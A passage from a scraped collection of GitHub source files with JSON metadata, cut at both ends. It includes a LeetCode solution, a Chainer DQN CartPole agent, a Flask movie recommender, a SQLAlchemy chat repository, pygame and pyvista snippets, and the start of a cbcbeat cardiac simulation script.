(ylim[1]-ylim[0])/10**6))\n\n # configure axis\n\n def formatter(x, p):\n return format(x/10**6, ',').replace(',', ' ')\n\n ax.get_xaxis().set_major_formatter(matplotlib.ticker.FuncFormatter(formatter))\n ax.get_yaxis().set_major_formatter(matplotlib.ticker.FuncFormatter(formatter))\n\n ax.set_xlabel('Unit: 1000 km')\n ax.set_ylabel('Unit: 1000 km')\n\n\n def savefig(self):\n scale = 1.5\n\n plt.rcParams['svg.hashsalt'] = 'constantseed' # https://github.com/matplotlib/matplotlib/pull/7748\n\n self.fig.set_size_inches((scale*self.figsizex, scale*self.figsizey))\n self.fig.savefig('%s/%s' % (get_script_folder(), self.config['outfile']), bbox_inches='tight')\n","repo_name":"alexfum75/Apollo","sub_path":"plot_common.py","file_name":"plot_common.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23772453443","text":"#\n# @lc app=leetcode id=409 lang=python3\n#\n# [409] Longest Palindrome\n#\n# Accepted\n# 95/95 cases passed (47 ms)\n# Your runtime beats 56.36 % of python3 submissions\n# Your memory usage beats 20.92 % of python3 submissions (13.9 MB)\n\n# @lc code=start\nclass Solution:\n def longestPalindrome(self, s: str) -> int:\n max_odd = 0\n total_sum = 0\n for c in set(s):\n count = s.count(c)\n if count % 2 == 1 and count > max_odd:\n if (max_odd != 0):\n total_sum += (max_odd - 1)\n max_odd = count\n elif count % 2 == 1:\n total_sum += (count - 1)\n else:\n total_sum += count\n return total_sum + max_odd\n \n# @lc code=end\n\n","repo_name":"SilasStokes/leetcode","sub_path":"python/409.longest-palindrome.py","file_name":"409.longest-palindrome.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16939240128","text":"DEFAULT_MEMBER_NAME = 'Medlem'\n# Name of the support membership type\nDEFAULT_SUPPORT_MEMBER_NAME = 'Støttemedlem'\n\n# Name of the status newly signed up members should be set to\nSIGNUP_STATUS_NAME = 'Innmeldt'\n# Name of status for members that have received welcome letter\nWELCOME_LETTER_NAME = 'Velkomstpakke'\nDEFAULT_MEMBER_STATUS_NAME = 'Medlem'\n\nSERVER_URL = 'https://klubbalfaromeonorge.appspot.com'\nPROFILE_URL = SERVER_URL + '/selfservice/profile'\n\nDEFAULT_MODEL_NAME = 'Annen Alfa Romeo'\n\nMEMBER_TYPE_EXPIRED = 'Utmeldt'\n","repo_name":"KlubbAlfaRomeoNorge/members","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29606350419","text":"import gym\nimport random\nimport numpy as np\nimport chainer\nfrom chainer import Function, Variable, optimizers\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\nimport copy as cp\n\n\nclass Model(Chain):\n def __init__(self):\n super(Model, self).__init__(\n l1 = L.Linear(4, 32),\n l2 = L.Linear(32, 512),\n l3 = L.Linear(512, 32),\n l4 = L.Linear(32, 2),\n )\n\n def __call__(self, x, y):\n return F.mean_squared_error(self.predict(x), y)\n\n def predict(self, x):\n h1 = F.leaky_relu(self.l1(x))\n h2 = F.leaky_relu(self.l2(h1))\n h3 = F.leaky_relu(self.l3(h2))\n y = F.leaky_relu(self.l4(h3))\n return y\n\n\nclass Agent:\n def __init__(self):\n self.model = Model()\n self.target_model = cp.deepcopy(self.model) \n self.optimizer = optimizers.Adam()\n self.optimizer.setup(self.model)\n self.experience = []\n self.max_experience =100 * 500 \n self.epsilon = 0.99\n self.decay = 0.9992\n self.batch_size = 32 \n self.gamma = 0.85\n self.loss = None \n \n\n def predict_action(self, state, target=False):\n x = Variable(np.array(state, dtype=np.float32).reshape((1, -1)))\n if target:\n return self.target_model.predict(x).data[0]\n else:\n return self.model.predict(x).data[0]\n\n def action(self, state):\n action = 0\n if np.random.random() < self.epsilon:\n action = random.randint(0,1)\n self.epsilon *= self.decay\n # print(\"random action: %f, epsilon: %f\" % (action, self.epsilon))\n else:\n action = np.argmax(self.predict_action(state))\n # print(\"greedy action: %f\" % action)\n return action\n\n def save_experience(self, exp):\n self.experience += exp\n # self.experience.sort(key=lambda x:x[\"total_rewards\"])\n exp_size = len(self.experience)\n while exp_size > self.max_experience:\n self.experience.pop(0)\n exp_size = len(self.experience)\n\n # for i in range(3):\n # print(\" min exp : %f\" % self.experience[0][\"total_rewards\"])\n\n\n # for i in range(3):\n # print(\" max exp : %f\" % self.experience[len(self.experience) - 1][\"total_rewards\"])\n\n def update_target_model(self):\n # Target Q-Learning\n self.target_model = cp.deepcopy(self.model) \n \n\n def replay(self):\n if len(self.experience) < self.batch_size:\n return\n \n batch = np.array(random.sample(self.experience, self.batch_size))\n # print(batch)\n x = Variable(np.array(map(lambda x:x[\"old_state\"], batch), dtype=np.float32))\n labels = np.array(self.model.predict(x).data.copy(), dtype=np.float32)\n for i in range(self.batch_size):\n action, reward, new_state, done = batch[i][\"action\"], batch[i][\"reward\"], batch[i][\"new_state\"], batch[i][\"done\"]\n \n if done:\n labels[i, action] = reward\n else:\n labels[i, action] = reward + self.gamma * np.max(self.predict_action(new_state, True))\n\n self.model.zerograds()\n loss = self.model(x, Variable(labels)) \n self.loss = loss\n loss.backward()\n self.optimizer.update()\n \n\nclass Trainer:\n def __init__(self):\n self.agt = Agent()\n self.exp = []\n self.logfile = \"result.log\"\n self.episode = 0\n\n def train(self):\n env = gym.make('CartPole-v0')\n # env.monitor.start(\"tmp/ex1\")\n with open(self.logfile, 'w') as f:\n f.write('episode, timestamp\\n')\n for i in range(30000):\n print(\"episode: %d\" % i)\n print(\" epsilon : %f\" % self.agt.epsilon)\n state = env.reset()\n total_rewards = 0\n self.exp = []\n self.episode = i\n\n for t in range(200):\n env.render()\n old_state = state.copy()\n action = self.agt.action(state)\n state, reward, done, info = env.step(action)\n total_rewards += reward\n new_state = state.copy()\n self.exp.append({\"old_state\": old_state, \"action\": action, \"reward\": reward, \"new_state\": new_state, \"done\": done})\n if done or t == 199:\n for j in range(len(self.exp)):\n self.exp[j][\"total_rewards\"] = total_rewards\n with open(self.logfile, 'a') as f:\n f.write(str(self.episode) + ',' + str(t) + '\\n')\n print(\" timestamp : %d\" % t)\n self.agt.save_experience(self.exp)\n break\n\n self.agt.replay()\n if self.agt.loss is not None:\n print(\" loss : %f\" % self.agt.loss.data)\n print(\" total rewards: %f\" % total_rewards)\n\n if i % 16 == 0:\n print(\" ## update target model\")\n self.agt.update_target_model()\n # env.monitor.close()\ntrainer = Trainer()\ntrainer.train()\n","repo_name":"kamito300/OpenAI","sub_path":"CartPole/dqn_agent.py","file_name":"dqn_agent.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38049203251","text":"import pyvista as pv\n\nmesh = pv.read('testtest.vti') # read data\n\nplotter = pv.Plotter() # instantiate the plotter\nplotter.add_volume(mesh, cmap='jet') # add volume\n\n#plotter.add_mesh_threshold(mesh) # add mesh threshold\n\n#Untick below statement to save file from vtk to vti\n#mesh.save('sarimage.vti', binary=False)\ncpos = plotter.show() # show the rendering window\n","repo_name":"lMavisl/Nijam","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69940726491","text":"import os\n\nfrom src.lib.string import get_name_from_url\nfrom src.settings import OUTPUT_DIR\n\nif __name__ == '__main__':\n \n with open(\"./torrents.txt\") as f:\n urls = f.readlines()\n for (index, url) in enumerate(urls, 1):\n name = get_name_from_url(url)\n \n fp = OUTPUT_DIR / (name + \".mp4\")\n \n print(fp)\n \n if fp.exists():\n os.rename(fp, OUTPUT_DIR / f\"{index}.mp4\")\n print(\"renamed\")\n","repo_name":"MarkShawn2020/simple-spiders","sub_path":"crawl-porn/main_rename.py","file_name":"main_rename.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38370203818","text":"import os\r\n\r\nimport pygame\r\nfrom game_objects.tower import Tower\r\n\r\n\r\nclass GenericButton(pygame.sprite.Sprite):\r\n \"\"\"Generic button.\"\"\"\r\n\r\n def __init__(self, x, y) -> None:\r\n super().__init__()\r\n\r\n self.x = x\r\n self.y = y\r\n\r\n\r\nclass TowerButton(GenericButton):\r\n \"\"\"Button that spawns towers.\"\"\"\r\n\r\n def __init__(self, x, y):\r\n super().__init__(x, y)\r\n\r\n curdir = os.path.dirname(__file__)\r\n self.image: pygame.Surface = pygame.image.load(\r\n os.path.join(curdir, \"..\", \"assets\", \"button.png\"))\r\n\r\n self.rect = self.image.get_rect()\r\n\r\n self.rect.x = self.x\r\n self.rect.y = self.y\r\n\r\n def click(self, pos: tuple) -> Tower:\r\n \"\"\"Run when the button is clicked.\r\n\r\n Args:\r\n pos (tuple): Position of the mouse that clicked the button.\r\n\r\n Returns:\r\n new_tower (game_objects.tower.Tower): A new tower.\r\n \"\"\"\r\n x, y = pos\r\n new_tower = Tower(x, y)\r\n return new_tower\r\n","repo_name":"TemeKoo/ot-harjoitustyo","sub_path":"src/ui/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"385009630","text":"\n#importing the required libraries\nimport numpy as np\nimport pandas as pd\nimport pickle\n#import matrix_factorization_utilities\nimport scipy.sparse as sp\nfrom scipy.sparse.linalg import svds\nfrom flask import Flask, render_template, request\nfrom IPython.display import HTML\n\ndef best_movies_by_genre(genre,top_n):\n movie_score = pd.read_csv('movie_score.csv')\n return pd.DataFrame(movie_score.loc[(movie_score[genre]==1)].sort_values(['weighted_score'],ascending=False)[['title','count','mean','weighted_score']][:top_n])\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/genre\", methods = ['GET','POST'])\ndef genre():\n if request.method == 'POST':\n result = request.form\n print(result['Genre'])\n print(type(result['Genre']))\n df = best_movies_by_genre(result['Genre'],10)\n df.reset_index(inplace=True)\n df = df.drop(labels='index', axis=1)\n html = HTML(df.to_html(classes='table table-striped'))\n dummy = {}\n dummy[0] = html\n # return str(html)\n return render_template(\"genre.html\",result = dummy, gename = {1:result['Genre']})\n \nif __name__ == \"__main__\":\n app.run(debug=True)\n\ndef init():\n movie_score = pd.read_csv('movie_score.csv')\n ratings_movies = pd.read_csv('ratings_movies.csv')\n movie_content_df_temp = pd.read_csv('mv_cnt_tmp.csv')\n a_file = open(\"indicies.pkl\", \"rb\")\n inds = pickle.load(a_file)\n a_file.close()\n print(inds['Skyfall (2012)'])\n rev_ind = {}\n for key,val in inds.items():\n rev_ind[val] = key\n from numpy import load\n data_dict = load('cosine.npz')\n cosine_sim = data_dict['arr_0']\n #ratings_movies.head()\n\n#movie_score.head()\n\n# Gives the best movies according to genre based on weighted score which is calculated using IMDB formula\n\n\n# best_movies_by_genre('Musical',10) \n\n# Gets the other top 10 movies which are watched by the people who saw this particular movie\n\ndef get_other_movies(movie_name):\n ratings_movies = pd.read_csv('ratings_movies.csv')\n #get all users who watched a specific movie\n df_movie_users_series = ratings_movies.loc[ratings_movies['title']==movie_name]['userId']\n #convert to a data frame\n df_movie_users = pd.DataFrame(df_movie_users_series,columns=['userId'])\n #get a list of all other movies watched by these users\n other_movies = pd.merge(df_movie_users,ratings_movies,on='userId')\n #get a list of the most commonly watched movies by these other user\n other_users_watched = pd.DataFrame(other_movies.groupby('title')['userId'].count()).sort_values('userId',ascending=False)\n other_users_watched['perc_who_watched'] = round(other_users_watched['userId']*100/other_users_watched['userId'][0],1)\n return other_users_watched[1:11]\n\n# get_other_movies('Gone Girl (2014)')\n\n\n\n# Directly getting top 10 movies based on content similarity\n# cosine_sim\n\ndef get_similar_movies_based_on_content(movie_name) :\n movie_content_df_temp = pd.read_csv('mv_cnt_tmp.csv')\n a_file = open(\"indicies.pkl\", \"rb\")\n inds = pickle.load(a_file)\n a_file.close()\n print(inds['Skyfall (2012)'])\n rev_ind = {}\n for key,val in inds.items():\n rev_ind[val] = key\n from numpy import load\n data_dict = load('cosine.npz')\n cosine_sim = data_dict['arr_0']\n movie_index = inds[movie_name]\n sim_scores = list(enumerate(cosine_sim[movie_index]))\n # Sort the movies based on the similarity scores\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n \n # Get the scores of the 10 most similar movies\n sim_scores = sim_scores[0:11]\n print(sim_scores)\n # Get the movie indices\n movie_indices = [i[0] for i in sim_scores]\n if(movie_index in movie_indices):\n movie_indices.remove(movie_index)\n print(movie_indices)\n similar_movies = pd.DataFrame(movie_content_df_temp[['title','genres']].iloc[movie_indices])\n return similar_movies[:10]\n\n# get_similar_movies_based_on_content('Skyfall (2012)')\n\n\n\n# #get ordered list of movieIds\n# item_indices = pd.DataFrame(sorted(list(set(ratings['movieId']))),columns=['movieId'])\n# #add in data frame index value to data frame\n# item_indices['movie_index']=item_indices.index\n# #inspect data frame\n# item_indices.head()\n\n\n# # In[166]:\n\n\n# #get ordered list of userIds\n# user_indices = pd.DataFrame(sorted(list(set(ratings['userId']))),columns=['userId'])\n# #add in data frame index value to data frame\n# user_indices['user_index']=user_indices.index\n# #inspect data frame\n# user_indices.head()\n\n\n# # In[167]:\n\n\n# ratings.head()\n\n\n# # In[168]:\n\n\n# #join the movie indices\n# df_with_index = pd.merge(ratings,item_indices,on='movieId')\n# #join the user indices\n# df_with_index=pd.merge(df_with_index,user_indices,on='userId')\n# #inspec the data frame\n# df_with_index.head()\n\n\n# # In[169]:\n\n\n# #import train_test_split module\n# from sklearn.model_selection import train_test_split\n# #take 80% as the training set and 20% as the test set\n# df_train, df_test= train_test_split(df_with_index,test_size=0.2)\n# print(len(df_train))\n# print(len(df_test))\n\n\n# # In[170]:\n\n\n# df_train.head()\n\n\n# # In[171]:\n\n\n# df_test.head()\n\n\n# # In[172]:\n\n\n# n_users = ratings.userId.unique().shape[0]\n# n_items = ratings.movieId.unique().shape[0]\n# print(n_users)\n# print(n_items)\n\n\n# # #### User_index is row and Movie_index is column and value is rating\n\n# # In[176]:\n\n\n# #Create two user-item matrices, one for training and another for testing\n# train_data_matrix = np.zeros((n_users, n_items))\n# #for every line in the data\n# for line in df_train.itertuples():\n# #set the value in the column and row to \n# #line[1] is userId, line[2] is movieId and line[3] is rating, line[4] is movie_index and line[5] is user_index\n# train_data_matrix[line[5], line[4]] = line[3]\n# train_data_matrix.shape\n\n\n# # In[177]:\n\n\n# #Create two user-item matrices, one for training and another for testing\n# test_data_matrix = np.zeros((n_users, n_items))\n# #for every line in the data\n# for line in df_test[:1].itertuples():\n# #set the value in the column and row to \n# #line[1] is userId, line[2] is movieId and line[3] is rating, line[4] is movie_index and line[5] is user_index\n# #print(line[2])\n# test_data_matrix[line[5], line[4]] = line[3]\n# #train_data_matrix[line['movieId'], line['userId']] = line['rating']\n# test_data_matrix.shape\n\n\n# # In[178]:\n\n\n# pd.DataFrame(train_data_matrix).head()\n\n\n# # In[179]:\n\n\n# df_train['rating'].max()\n\n\n# # In[180]:\n\n\n# from sklearn.metrics import mean_squared_error\n# from math import sqrt\n# def rmse(prediction, ground_truth):\n# #select prediction values that are non-zero and flatten into 1 array\n# prediction = prediction[ground_truth.nonzero()].flatten() \n# #select test values that are non-zero and flatten into 1 array\n# ground_truth = ground_truth[ground_truth.nonzero()].flatten()\n# #return RMSE between values\n# return sqrt(mean_squared_error(prediction, ground_truth))\n\n\n# # In[181]:\n\n\n# #Calculate the rmse sscore of SVD using different values of k (latent features)\n# from scipy.sparse.linalg import svds\n\n# rmse_list = []\n# for i in [1,2,5,20,40,60,100,200]:\n# #apply svd to the test data\n# u,s,vt = svds(train_data_matrix,k=i)\n# #get diagonal matrix\n# s_diag_matrix=np.diag(s)\n# #predict x with dot product of u s_diag and vt\n# X_pred = np.dot(np.dot(u,s_diag_matrix),vt)\n# #calculate rmse score of matrix factorisation predictions\n# rmse_score = rmse(X_pred,test_data_matrix)\n# rmse_list.append(rmse_score)\n# print(\"Matrix Factorisation with \" + str(i) +\" latent features has a RMSE of \" + str(rmse_score))\n\n\n# # In[182]:\n\n\n# #Convert predictions to a DataFrame\n# mf_pred = pd.DataFrame(X_pred)\n# mf_pred.head()\n\n\n# # In[183]:\n\n\n# df_names = pd.merge(ratings,movie_list,on='movieId')\n# df_names.head()\n\n\n# # In[184]:\n\n\n# #choose a user ID\n# user_id = 1\n# #get movies rated by this user id\n# users_movies = df_names.loc[df_names[\"userId\"]==user_id]\n# #print how many ratings user has made \n# print(\"User ID : \" + str(user_id) + \" has already rated \" + str(len(users_movies)) + \" movies\")\n# #list movies that have been rated\n# users_movies\n\n\n# # In[185]:\n\n\n# user_index = df_train.loc[df_train[\"userId\"]==user_id]['user_index'][:1].values[0]\n# #get movie ratings predicted for this user and sort by highest rating prediction\n# sorted_user_predictions = pd.DataFrame(mf_pred.iloc[user_index].sort_values(ascending=False))\n# #rename the columns\n# sorted_user_predictions.columns=['ratings']\n# #save the index values as movie id\n# sorted_user_predictions['movieId']=sorted_user_predictions.index\n# print(\"Top 10 predictions for User \" + str(user_id))\n# #display the top 10 predictions for this user\n# pd.merge(sorted_user_predictions,movie_list, on = 'movieId')[:10]\n\n\n# # In[186]:\n\n\n# #count number of unique users\n# numUsers = df_train.userId.unique().shape[0]\n# #count number of unitque movies\n# numMovies = df_train.movieId.unique().shape[0]\n# print(len(df_train))\n# print(numUsers) \n# print(numMovies) \n\n\n# # In[187]:\n\n\n# #Separate out the values of the df_train data set into separate variables\n# Users = df_train['userId'].values\n# Movies = df_train['movieId'].values\n# Ratings = df_train['rating'].values\n# print(Users),print(len(Users))\n# print(Movies),print(len(Movies))\n# print(Ratings),print(len(Ratings))\n\n\n# # In[194]:\n\n\n# #import libraries\n# import tensorflow as tf\n# from tensorflow import keras\n# from keras.layers import Embedding, Reshape \n# from keras.models import Sequential\n# from keras.optimizers import Adam\n# from keras.callbacks import EarlyStopping, ModelCheckpoint\n\n\n# # In[195]:\n\n\n# from keras.utils import plot_model\n\n\n# # In[196]:\n\n\n# # Couting no of unique users and movies\n# len(ratings.userId.unique()), len(ratings.movieId.unique())\n\n\n# # In[197]:\n\n\n# # Assigning a unique value to each user and movie in range 0,no_of_users and 0,no_of_movies respectively.\n# ratings.userId = ratings.userId.astype('category').cat.codes.values\n# ratings.movieId = ratings.movieId.astype('category').cat.codes.values\n\n\n# # In[198]:\n\n\n# # Splitting the data into train and test.\n# train, test = train_test_split(ratings, test_size=0.2)\n\n\n# # In[199]:\n\n\n# train.head()\n\n\n# # In[200]:\n\n\n# test.head()\n\n\n# # In[201]:\n\n\n# n_users, n_movies = len(ratings.userId.unique()), len(ratings.movieId.unique())\n\n\n# # In[204]:\n\n\n# # Returns a neural network model which performs matrix factorisation\n# def matrix_factorisation_model_with_n_latent_factors(n_latent_factors) :\n# movie_input = keras.layers.Input(shape=[1],name='Item')\n# movie_embedding = keras.layers.Embedding(n_movies + 1, n_latent_factors, name='Movie-Embedding')(movie_input)\n# movie_vec = keras.layers.Flatten(name='FlattenMovies')(movie_embedding)\n\n# user_input = keras.layers.Input(shape=[1],name='User')\n# user_vec = keras.layers.Flatten(name='FlattenUsers')(keras.layers.Embedding(n_users + 1, n_latent_factors,name='User-Embedding')(user_input))\n# prod = keras.layers.dot([movie_vec, user_vec], axes=1)\n \n# model = keras.Model([user_input, movie_input], prod)\n# model.compile('adam', 'mean_squared_error')\n \n# return model\n\n\n# # In[205]:\n\n\n# model = matrix_factorisation_model_with_n_latent_factors(20)\n\n\n# # In[206]:\n\n\n# model.summary()\n\n\n# # In[ ]:\n\n\n# #Training the model\n# history = model.fit([train.userId, train.movieId], train.rating, epochs=50, verbose=0)\n\n\n# # In[391]:\n\n\n# y_hat = np.round(model.predict([test.userId, test.movieId]),0)\n# y_true = test.rating\n\n\n# # In[392]:\n\n\n# from sklearn.metrics import mean_absolute_error\n# mean_absolute_error(y_true, y_hat)\n\n\n# # In[393]:\n\n\n# #Getting summary of movie embeddings\n# movie_embedding_learnt = model.get_layer(name='Movie-Embedding').get_weights()[0]\n# pd.DataFrame(movie_embedding_learnt).describe()\n\n\n# # In[394]:\n\n\n# # Getting summary of user embeddings from the model\n# user_embedding_learnt = model.get_layer(name='User-Embedding').get_weights()[0]\n# pd.DataFrame(user_embedding_learnt).describe()\n\n\n# # In[395]:\n\n\n# from keras.constraints import non_neg\n\n\n# # In[396]:\n\n\n# # Returns a neural network model which performs matrix factorisation with additional constraint on embeddings(that they can't be negative)\n# def matrix_factorisation_model_with_n_latent_factors_and_non_negative_embedding(n_latent_factors) :\n# movie_input = keras.layers.Input(shape=[1],name='Item')\n# movie_embedding = keras.layers.Embedding(n_movies + 1, n_latent_factors, name='Non-Negative-Movie-Embedding',embeddings_constraint=non_neg())(movie_input)\n# movie_vec = keras.layers.Flatten(name='FlattenMovies')(movie_embedding)\n\n# user_input = keras.layers.Input(shape=[1],name='User')\n# user_vec = keras.layers.Flatten(name='FlattenUsers')(keras.layers.Embedding(n_users + 1, n_latent_factors,name='Non-Negative-User-Embedding',embeddings_constraint=non_neg())(user_input))\n# prod = keras.layers.merge([movie_vec, user_vec], mode='dot',name='DotProduct')\n \n# model = keras.Model([user_input, movie_input], prod)\n# model.compile('adam', 'mean_squared_error')\n \n# return model\n\n\n# # In[397]:\n\n\n# model2 = matrix_factorisation_model_with_n_latent_factors_and_non_negative_embedding(5)\n\n\n# # In[412]:\n\n\n# model2.summary()\n\n\n# # In[398]:\n\n\n# history_nonneg = model2.fit([train.userId, train.movieId], train.rating, epochs=50, verbose=0)\n\n\n# # In[399]:\n\n\n# movie_embedding_learnt = model2.get_layer(name='Non-Negative-Movie-Embedding').get_weights()[0]\n# pd.DataFrame(movie_embedding_learnt).describe()\n\n\n# # In[401]:\n\n\n# y_hat = np.round(model2.predict([test.userId, test.movieId]),0)\n# y_true = test.rating\n\n\n# # In[402]:\n\n\n# mean_absolute_error(y_true, y_hat)\n\n\n# # In[409]:\n\n\n# # Returns a neural network model which does recommendation\n# def neural_network_model(n_latent_factors_user, n_latent_factors_movie):\n \n# movie_input = keras.layers.Input(shape=[1],name='Item')\n# movie_embedding = keras.layers.Embedding(n_movies + 1, n_latent_factors_movie, name='Movie-Embedding')(movie_input)\n# movie_vec = keras.layers.Flatten(name='FlattenMovies')(movie_embedding)\n# movie_vec = keras.layers.Dropout(0.2)(movie_vec)\n\n\n# user_input = keras.layers.Input(shape=[1],name='User')\n# user_vec = keras.layers.Flatten(name='FlattenUsers')(keras.layers.Embedding(n_users + 1, n_latent_factors_user,name='User-Embedding')(user_input))\n# user_vec = keras.layers.Dropout(0.2)(user_vec)\n\n\n# concat = keras.layers.merge([movie_vec, user_vec], mode='concat',name='Concat')\n# concat_dropout = keras.layers.Dropout(0.2)(concat)\n# dense = keras.layers.Dense(100,name='FullyConnected')(concat)\n# dropout_1 = keras.layers.Dropout(0.2,name='Dropout')(dense)\n# dense_2 = keras.layers.Dense(50,name='FullyConnected-1')(concat)\n# dropout_2 = keras.layers.Dropout(0.2,name='Dropout')(dense_2)\n# dense_3 = keras.layers.Dense(20,name='FullyConnected-2')(dense_2)\n# dropout_3 = keras.layers.Dropout(0.2,name='Dropout')(dense_3)\n# dense_4 = keras.layers.Dense(10,name='FullyConnected-3', activation='relu')(dense_3)\n\n\n# result = keras.layers.Dense(1, activation='relu',name='Activation')(dense_4)\n# adam = Adam(lr=0.005)\n# model = keras.Model([user_input, movie_input], result)\n# model.compile(optimizer=adam,loss= 'mean_absolute_error')\n# return model\n\n# model3 = neural_network_model(10,13)\n\n# history_neural_network = model3.fit([train.userId, train.movieId], train.rating, epochs=50, verbose=0)\n\n# model3.summary()\n\n# y_hat = np.round(model3.predict([test.userId, test.movieId]),0)\n# y_true = test.rating\n# mean_absolute_error(y_true, y_hat)","repo_name":"maalolankannan1/recomovie","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":15679,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"22081979254","text":"import logging\nfrom typing import Optional\n\nfrom sqlalchemy import select\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom src.db.models.chat import Chat\nfrom src.db.repository._base import SQLAlchemyRepo\nfrom src.filters.callback_data import Action\n\nlogger = logging.getLogger(__name__)\n\n\nclass ChatRepo(SQLAlchemyRepo):\n\n # async def find_chat_settings(self, chat_id):\n # stmt = select(Chat).where(Chat.chat_tg_id == chat_id)\n # _ = await self.session.execute(stmt)\n # return parse_obj_as(Chat, _.first())\n\n async def find_chat_settings(self, chat_id):\n logger.debug(\"find_chat_settings\")\n stmt = select(Chat).where(Chat.chat_tg_id == chat_id)\n # _ = await self.session.execute(stmt)\n _ = await self.session.execute(stmt)\n chat = _.scalars().first()\n if chat:\n logger.debug('chat with id: {%s} mode {%s} is activ', chat_id, chat.mode)\n return chat\n else:\n self.session.add(Chat(chat_tg_id=chat_id))\n await self.session.commit()\n return await self.find_chat_settings(chat_id=chat_id)\n\n async def add(self, chat: Chat):\n logger.debug(\"add\")\n try:\n self.session.add(chat)\n await self.session.commit()\n except SQLAlchemyError:\n msg_err = f\"Error add chat with id: ( chat_id:{chat.chat_tg_id})\"\n logger.error(msg_err)\n await self.session.rollback()\n raise\n\n async def update(self, chat_id: int, mode: Optional[str] = None, mute_action: Optional[Action] = None,\n warning_action: Optional[Action] = None):\n logger.debug(\"update\")\n stmt = select(Chat).where(Chat.chat_tg_id == chat_id)\n chat: Chat = (await self.session.execute(stmt)).scalars().first()\n if chat:\n current_num_warnings = chat.num_warnings\n current_mute_time = chat.mute_time\n if mode:\n chat.mode = mode\n if mute_action == Action.mute_minus:\n if current_mute_time > 300:\n chat.mute_time = current_mute_time - 300\n if mute_action == Action.mute_plus:\n if current_mute_time < 3000:\n chat.mute_time = current_mute_time + 300\n if warning_action == Action.warning_minus:\n if current_num_warnings > 1:\n chat.num_warnings = current_num_warnings - 1\n if warning_action == Action.warning_plus:\n if current_num_warnings < 128:\n chat.num_warnings = current_num_warnings + 1\n try:\n # self.session.add(chat)\n await self.session.commit()\n return chat\n except SQLAlchemyError:\n msg_err = f\"Error add chat with id: ( chat_id:{chat.chat_tg_id})\"\n logger.error(msg_err)\n await self.session.rollback()\n raise\n else:\n chat = Chat(chat_tg_id=chat_id)\n await self.add(chat)\n return chat\n\n async def get_chat_num_messages(self, chat_id):\n logger.debug(\"get_chat_num_messages\")\n stmt = select(Chat.message_counter).where(Chat.chat_tg_id == chat_id)\n _ = await self.session.execute(stmt)\n num_chat_messages = _.scalars().first()\n logger.debug('chat with id: {%s}, num_chat_messages: {%s}', chat_id, num_chat_messages)\n return num_chat_messages if num_chat_messages is not None else 0\n\n async def messages_increment(self, chat_id):\n logger.debug(\"num_messages_increment\")\n stmt = select(Chat).where(Chat.chat_tg_id == chat_id)\n chat: Chat = (await self.session.execute(stmt)).scalars().first()\n if chat:\n chat.message_counter = chat.message_counter + 1\n try:\n await self.session.commit()\n return chat\n except SQLAlchemyError:\n msg_err = \"Error num_messages_increment chat with id:{%s})\"\n logger.error(msg_err, chat_id)\n await self.session.rollback()\n raise\n else:\n chat = Chat(chat_tg_id=chat_id)\n await self.add(chat)\n return chat\n","repo_name":"alexandr-khvatov/ForgetToxicChat","sub_path":"src/db/repository/chat_repo.py","file_name":"chat_repo.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21361621469","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# .. _first_example\n#\n# A basic practical example of how to use the cbcbeat module, in\n# particular how to solve the monodomain equations coupled to a\n# moderately complex cell model using the splitting solver provided by\n# cbcbeat.\n#\n# How to use the cbcbeat module to solve a cardiac EP problem\n# ===========================================================\n#\n# This demo shows how to\n# * Use a cardiac cell model from supported cell models\n# * Define a cardiac model based on a mesh and other input\n# * Use and customize the main solver (SplittingSolver)\n\n# Import the cbcbeat module\nimport matplotlib.pyplot as plt\nfrom cbcbeat import *\nimport numpy as np\n\n# Turn on FFC/FEniCS optimizations\nparameters[\"form_compiler\"][\"representation\"] = \"uflacs\"\nparameters[\"form_compiler\"][\"cpp_optimize\"] = True\nflags = [\"-O3\", \"-ffast-math\", \"-march=native\"]\nparameters[\"form_compiler\"][\"cpp_optimize_flags\"] = \" \".join(flags)\nparameters[\"form_compiler\"][\"quadrature_degree\"] = 3\n\n# Turn off adjoint functionality\nimport cbcbeat\nif cbcbeat.dolfin_adjoint:\n parameters[\"adjoint\"][\"stop_annotating\"] = True\n\n# Define the computational domain\nmesh = Mesh('mesh/pre_torso.xml')\nmarker = MeshFunction(\"size_t\", mesh, mesh.topology().dim(), mesh.domains())\n\nrefined_mesh = mesh\nrefined_marker = marker\n\n#refined_mesh = adapt(mesh)\n#refined_marker = adapt(marker, refined_mesh)\n\nheart_mesh = MeshView.create(refined_marker, 2)\ntorso_mesh = MeshView.create(refined_marker, 1)\n\n#refined_mesh = adapt(refined_mesh)\n#refined_marker = adapt(refined_marker, refined_mesh)\n#heart_mesh = MeshView.create(refined_marker, 